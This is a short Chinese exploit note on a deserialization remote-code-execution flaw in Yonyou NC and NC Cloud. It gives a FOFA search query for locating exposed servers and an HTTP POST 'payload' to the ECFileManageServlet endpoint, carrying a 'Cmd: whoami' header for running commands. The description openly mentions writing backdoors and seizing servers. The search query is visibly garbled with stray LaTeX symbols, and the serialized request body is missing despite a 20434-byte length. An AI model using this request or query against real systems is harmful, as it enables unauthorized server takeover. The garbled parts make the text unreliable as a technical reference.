# Y4-66用友-NC-反序列化RCE

## 漏洞描述:

用友 NC及NC Cloud 存在多处反序列化代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

#### 网站图片:









连接

UClient 提供全新客户端,消除浏览器依赖,完成用户 UClient 打造—个面向企业的端服务平台,提供改善体 与企业应用的链接优化,并支持企业应用在终端上的自 验相关的端服务,并对提供的服务进行应用优化。 动升级。

体验

社交

UClient 通过嵌入社交协同能力,建立企业用户之间的 连接,提供企业间数据共享和连接的服务,形成基于1 业服务云平台的企业社交网络。

版权所有© 2015 用友网络科技股份有限公司

## 网络测绘:

## fofa语法:

 $banner="nccloud" \parallel header="nccloud" \parallel (body="'platform'yonyou-yyy.js" \&\& body="logo/frangesi") \parallel body='window.location.href='l'platform'pub/welcome.do\"," \parallel (body="'UFIDA" \&\& body="logo/frangesi") \parallel body='window.location.href='l'platform'pub/welcome.do\"," \parallel (body="'UFIDA" &\& body="logo/frangesi") \parallel body=''ufilam' body=''logo/frangesi'') \parallel body=''ufilam' body=''logo/frangesi'' | body=''ufilam' bo$ body="logo/images/ufida\_nc.png" || title="Yonyou NC" || body="

"|| body="

## 漏洞复现:

#### payload:

POST /servlet/~ecapppub/nc.impl.ecpubapp.filemanager.service.ECFileManageServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_14\_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: whoami
Accept-Encoding: gzip
Content-Length: 20434

#### 效果图:

